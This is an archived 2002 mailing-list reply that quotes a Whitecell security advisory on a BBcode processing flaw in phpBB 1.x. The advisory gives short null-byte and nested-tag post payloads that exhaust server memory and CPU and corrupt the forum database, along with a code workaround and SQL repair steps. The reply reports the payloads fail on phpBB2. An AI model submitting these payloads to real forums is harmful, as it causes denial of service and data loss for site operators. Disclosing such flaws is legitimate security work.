Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: (WSS-Advisories-02003) PHPBB BBcode Process Vulnerability

From: "<-delusion->" <delusi0n () bellsouth net>
Date: Thu, 4 Apr 2002 17:23:46 -0500
This particular vulnerability does not work on phpBB2. I tested it out by
posting with [code]"800 \0's goes here"[/code], and it just shows the code
which was 800 \0's in the post. Nothing bad happened to the database or the
processes. So this vulnerabilty does not work on phpBB2 forums.

-delusion
http://www.digital-delusions.com

----- Original Message -----
From: "Whitecell Security Systems" <security () whitecell org>
To: <bugtraq () securityfocus com>; <vuln-dev () securityfocus com>
Sent: Thursday, April 04, 2002 8:23 AM
Subject: (WSS-Advisories-02003) PHPBB BBcode Process Vulnerability



(WSS-Advisories-02003) PHPBB BBcode Process Vulnerability


Release infomation
------------------

Release Date: 2001-4-4
Author:   By Whitecell Security Systems(WSS)
          tombkeeper (tombkeeper () whitecell org)
      alert7     (alert7 () whitecell org)
Homepage: http://www.whitecell.org/


Impact:
--------

WSS has found a vulnerability in PHPBB when PHPBB process BBcode,which

could

enbale one user D.O.S system and destroy PHPBB databases.


Affected  Versions
--------------------

phpBB Group phpBB 1.4.4
phpBB Group phpBB 1.4.2
phpBB Group phpBB 1.4.1
phpBB Group phpBB 1.4.0
phpBB Group phpBB 1.2.1
phpBB Group phpBB 1.2.0
phpBB Group phpBB 1.0.0
----------------------------

NOT TEST:
phpBB Group phpBB 2.x


Description:
------------

  phpbb support nesting BBcode

[code][/code],[quote][/quote],[list][/list].

Unfortunately,there is a mistake when process BBcode in functions.php .


Exploit:
----------

一:
submit the following poster:

[code]
\0\0\0\0\0\0\0
[/code]

In fact, the following data have saved to database after BBcode process.

[1code]
\0\0\0\0\0\0\0
[/code1][1code]
\0\0\0\0\0\0\0
[/code1][1code]
\0\0\0\0\0\0\0
[/code1][1code]
\0\0\0\0\0\0\0
[/code1][1code]
\0\0\0\0\0\0\0
[/code1][1code]
\0\0\0\0\0\0\0
[/code1][1code]
\0\0\0\0\0\0\0
[/code1]

二:
submit the following poster:
[code]'\0'*800[/code]

see system
whitecell$ top
PID  USER      PRI  NI  SIZE  RSS SHARE STAT     TIME COMMAND
8643 nobody    13   0   212M  81M 13604 D     8.0 65.7   0:07 httpd

phpbb error message:
Could not enter post text!

but in fact ,Two data  have alreay saved to databases.Now, the database
is uncompleted.If you brower the forum to see which you post,phpbb could
report message:"Could not connect to the forums database."

三:
submit 49 bytes data:

[code]\0[code]\0[code]\0[/code]\0[/code]\0[/code]

type top to see cpu:
  PID USER     PRI  NI  SIZE  RSS SHARE STAT     TIME COMMAND
25741 nobody    14   0 11828 9996   416 R    99.9  7.8   2:38 httpd

Experiment environment:linux 2.4.10   Apache/1.3.23   PHP 4.1.2


Vendor
--------

http://www.phpbb.com


Workaround:
-----------

1:disale BBcode until Vendor fixed.
2:modify functions.php bbencode_code()

function bbencode_code($message, $is_html_disabled)
{
$message = preg_replace("/\[code\](.*?)\[\/code\]/si", "<!-- BBCode

Start --><TABLE BORDER=0 ALIGN=CENTER WIDTH=85><TR><TD><font
size=-1>Code:</font><HR></TD></TR><TR><TD><FONT
SIZE=-1><PRE>\\1</PRE></FONT></TD></TR><TR><TD><HR></TD></TR></TABLE><!--
BBCode End -->", $message);

return $message;

} // bbencode_code()

REPAIR DATABASE:
if url is http://host/forums/viewtopic.php?topic=1162&forum=1&0
you can use the following command to repair it :
whitecell$ mysql -uuser -ppasswd
mysql> use databasename;
mysql> select *  from topics where topic_id = 1162; //GET post_id
mysql> delete from posts where post_id = 6280;
mysql> delete from posts_text where post_id = 6280;
mysql> delete  from topics where topic_id = 1162;


ABOUT WSS:
------------

WSS is a non-profit and free technology organization . We are devoting to
research and demonstration of weaknesses related to network services ,
communication security and system security.


Copyright 2002 http://www.whitecell.org/  All rights reserved.
Previous By Date Next
Previous By Thread Next

Current thread: